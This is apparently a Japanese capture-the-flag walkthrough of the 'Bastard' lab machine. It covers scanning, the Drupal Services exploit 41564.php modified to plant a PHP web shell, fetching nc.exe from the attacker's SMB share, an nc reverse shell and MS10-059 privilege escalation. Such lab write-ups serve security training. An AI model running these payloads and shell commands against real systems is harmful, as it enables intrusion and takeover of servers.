nikto

┌──(kali㉿kali)-[~]

└─$ nikto -host http://10.10.10.9

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP:          10.10.10.9

+ Target Hostname:    10.10.10.9

+ Target Port:        80

+ Start Time:       

---------------------------------------------------------------------------

+ Server: Microsoft-IIS/7.5

+ Retrieved x-powered-by header: ARRAY(0x5608ccc56a20)

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)

+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)

+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)

+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)

+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)

+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)

+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)

+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)

+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)

+ Entry '/filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)

+ Entry '/user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)

+ Entry '/user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)

+ Entry '/user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)

+ Entry '/?q=comment/reply/' in robots.txt returned a non-forbidden or redirect HTTP code (200)

+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)

+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)

+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)

+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)

+ "robots.txt" contains 68 entries which should be manually viewed.

+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 

+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 

+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.

+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.

+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.

+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.

+ OSVDB-3092: /README.TXT: This might be interesting...

+ OSVDB-3092: /readme.txt: This might be interesting...

+ OSVDB-3092: /user/: This might be interesting...

+ OSVDB-3092: /UPGRADE.txt: Default file found.

+ OSVDB-3092: /install.php: Drupal install.php file found.

+ OSVDB-3092: /install.php: install.php file found.

+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.

+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.

+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.

+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.

+ OSVDB-3092: /license.txt: License file found may identify site software.

+ OSVDB-3092: /LICENSE.TXT: License file found may identify site software.

+ 8757 requests: 10 error(s) and 39 item(s) reported on remote host

+ End Time:           2021-06-23 20:50:40 (GMT9) (21122 seconds)

---------------------------------------------------------------------------

 

dirb

┌──(kali㉿kali)-[~]

└─$ dirb http://10.10.10.9

 

-----------------

DIRB v2.22    

By The Dark Raver

-----------------

 

START_TIME: 

URL_BASE: http://10.10.10.9/

WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

 

-----------------

 

GENERATED WORDS: 4612                                                          

 

---- Scanning URL: http://10.10.10.9/ ----

+ http://10.10.10.9/0 (CODE:200|SIZE:7583)                                                                                   

+ http://10.10.10.9/admin (CODE:403|SIZE:1233)                                                                               

+ http://10.10.10.9/Admin (CODE:403|SIZE:1233)                                                                               

+ http://10.10.10.9/ADMIN (CODE:403|SIZE:1233)                                                                               

+ http://10.10.10.9/batch (CODE:403|SIZE:1233)                                                                               

==> DIRECTORY: http://10.10.10.9/includes/                                                                                   

+ http://10.10.10.9/index.php (CODE:200|SIZE:7583)                                                                           

+ http://10.10.10.9/install.mysql (CODE:403|SIZE:1233)                                                                       

+ http://10.10.10.9/install.pgsql (CODE:403|SIZE:1233)       

※途中で中断しました。

 

gobuster

gobuster dir -u http://10.10.10.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k -o bastard.gobuster

※未実施

┌──(kali㉿kali)-[~]

└─$ searchsploit drupal 7

-------------------------------------------------------------------------------------------- ---------------------------------

 Exploit Title                                                                              |  Path

-------------------------------------------------------------------------------------------- ---------------------------------

Drupal 4.1/4.2 - Cross-Site Scripting                                                       | php/webapps/22940.txt

Drupal 4.5.3 < 4.6.1 - Comments PHP Injection                                               | php/webapps/1088.pl

Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution                                 | php/webapps/1821.php

Drupal 4.x - URL-Encoded Input HTML Injection                                               | php/webapps/27020.txt

Drupal 5.2 - PHP Zend Hash ation Vector                                                     | php/webapps/4510.txt

Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities                      | php/webapps/11060.txt

Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                           | php/webapps/34992.py

Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                            | php/webapps/44355.php

Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                 | php/webapps/34984.py

Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                 | php/webapps/34993.php

Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                    | php/webapps/35150.php

Drupal 7.12 - Multiple Vulnerabilities                                                      | php/webapps/18564.txt

Drupal 7.x Module Services - Remote Code Execution                                          | php/webapps/41564.php

Drupal < 4.7.6 - Post Comments Remote Command Execution                                     | php/webapps/3313.pl

Drupal < 5.1 - Post Comments Remote Command Execution                                       | php/webapps/3312.pl

Drupal < 5.22/6.16 - Multiple Vulnerabilities                                               | php/webapps/33706.txt

Drupal < 7.34 - Denial of Service                                                           | php/dos/35415.txt

Drupal < 7.34 - Denial of Service                                                           | php/dos/35415.txt

Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                    | php/webapps/44557.rb

Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                 | php/webapps/44542.txt

Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution         | php/webapps/44449.rb

Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution         | php/webapps/44449.rb

Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)     | php/remote/44482.rb

Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)     | php/remote/44482.rb

Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)            | php/webapps/44448.py

Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (M | php/remote/46510.rb

Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                              | php/webapps/46452.txt

Drupal < 8.6.9 - REST Module Remote Code Execution                                          | php/webapps/46459.py

Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                           | php/webapps/44501.txt

Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting      | php/webapps/25493.txt

Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)                             | php/webapps/40149.rb

Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                               | php/remote/40144.php

Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting                     | php/webapps/35397.txt

Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload              | php/webapps/37453.php

Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multipl | php/webapps/35072.txt

Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                           | php/remote/40130.rb

-------------------------------------------------------------------------------------------- ---------------------------------

41564のコードを見てみます。 

┌──(kali㉿kali)-[~]

└─$ searchsploit -m 41564

  Exploit: Drupal 7.x Module Services - Remote Code Execution

      URL: https://www.exploit-db.com/exploits/41564

     Path: /usr/share/exploitdb/exploits/php/webapps/41564.php

File Type: ASCII text, with CRLF line terminators

 

Copied to: /home/kali/41564.php

 

 

                                                                                                                              

┌──(kali㉿kali)-[~]

└─$ cat 41564.php 

# Exploit Title: Drupal 7.x Services Module Remote Code Execution

# Vendor Homepage: https://www.drupal.org/project/services

# Exploit Author: Charles FOL

# Contact: https://twitter.com/ambionics 

# Website: https://www.ambionics.io/blog/drupal-services-module-rce

 

 

#!/usr/bin/php

<?php

# Drupal Services Module Remote Code Execution Exploit

# https://www.ambionics.io/blog/drupal-services-module-rce

# cf

#

# Three stages:

# 1. Use the SQL Injection to get the contents of the cache for current endpoint

#    along with admin credentials and hash

# 2. Alter the cache to allow us to write a file and do so

# 3. Restore the cache

# 

 

# Initialization

 

error_reporting(E_ALL);

 

define('QID', 'anything');

define('TYPE_PHP', 'application/vnd.php.serialized');

define('TYPE_JSON', 'application/json');

define('CONTROLLER', 'user');

define('ACTION', 'login');

 

$url = 'http://vmweb.lan/drupal-7.54';

$endpoint_path = '/rest_endpoint';

$endpoint = 'rest_endpoint';

 

$file = [

    'filename' => 'dixuSOspsOUU.php',

    'data' => '<?php eval(file_get_contents(\'php://input\')); ?>'

];

※以下、略                                                                                                                              

 上記の赤い部分を自身の環境に合わせて変更します。

「’data’」の部分は以下のように変更します。

$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

$file = [
    'filename' => 'dixuSOspsOUU.php',
    'data' => '<?php system($_REQUEST["cmd"]); ?>'
];

┌──(kali㉿kali)-[~/bastard]
└─$ php 41564.php            
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics 
# Website: https://www.ambionics.io/blog/drupal-services-module-rce

 

#!/usr/bin/php

Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries

File written: http://10.10.10.9/dixuSOspsOUU.php
                                                                                                           
┌──(kali㉿kali)-[~/bastard]
└─$ ls
41564.php  session.json  user.json 

Firefoxのプラグイン「Cookie Manager」に上記で生成したクッキー情報を入力して、再度アクセスを行います。

上記設定後、Bastradのページを更新すると管理者のセッションでアクセスすることができました。

ここから、リバースシェル取得のためのPHPコードをアップロードしてアクセスを取得する記事をいくつか見ましたが、私の環境ではうまく攻撃することができなかったため、ほかの方法で攻略します。

「41564.php」の中で指定している「'filename' => 'dixuSOspsOUU.php'」に対して、パラメータをつけてアクセスします。

http://10.10.10.9/dixuSOspsOUU.php?cmd=whoami

パラメータに指定したコマンドが実行できました。

続いて、ncをBastradで実行させます。

ncのコピー

┌──(kali㉿kali)-[~/bastard]
└─$ cp /usr/share/windows-binaries/nc.exe /home/kali/bastard/

smbサーバの起動

Impacketダウンロード

┌──(kali㉿kali)-[~/bastard]

└─$ sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket 

/opt/impacketのディレクトリで以下のコマンドを実行し、smbサーバを起動します。

┌──(kali㉿kali)-[/opt/impacket]
└─$ sudo smbserver.py kali /home/kali/bastard

先ほどBastardでコマンドを実行したのと同じ要領で以下を実行します。

http://10.10.10.9/dixuSOspsOUU.php?cmd=copy%20\\10.10.14.14\kali\nc.exe%20nc.exe 

Bastard上にncがコピーされるので、kali側で待ち受けたのち、再度Bastradより接続を行います。

http://10.10.10.9/dixuSOspsOUU.php?cmd=nc.exe 10.10.14.29 4444 -e cmd.exe 

システム権限がないので続けて権限昇格を行います。

権限昇格

脆弱性を確認するために、Windows-Exploit-Suggesterを利用します。

sudo git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git

Suggesterをアップデートします。

python /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py --update

Bastrad上でsysteminfoを実行した結果をテキストファイルとしてKali上に移動し、以下のコマンドを実行します。

┌──(kali㉿kali)-[/opt/Windows-Exploit-Suggester]

└─$ sudo python3 ./windows-exploit-suggester.py --database 2021-08-07-mssb.xls --systeminfo /home/kali/bastard/bastard.txt

[*]initiating winsploit version 3.3...

[*]database file detected as xls or xlsx based on extension

[*]attempting to read from the systeminfo input file

[+]systeminfo input file read successfully (utf-8)

[*]querying database file for potential vulnerabilities

[*]comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits

[*]there are now 197 remaining vulns

[+][E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin

[+]windows version identified as 'Windows 2008 R2 64-bit'

[*]

[M]MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical

[M]MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important

[E]MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical

[*]  http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC

[*]  http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC

[*]

[E]MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important

[M]MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important

[M]MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical

[E]MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important

[E]MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important

[M]MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical

[M]MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical

[*]done

上記結果のうちMS10-059を使用して権限昇格を行います。

github.com

MS10-059.exeをBastard上で実行するとシステム権限を取得できました。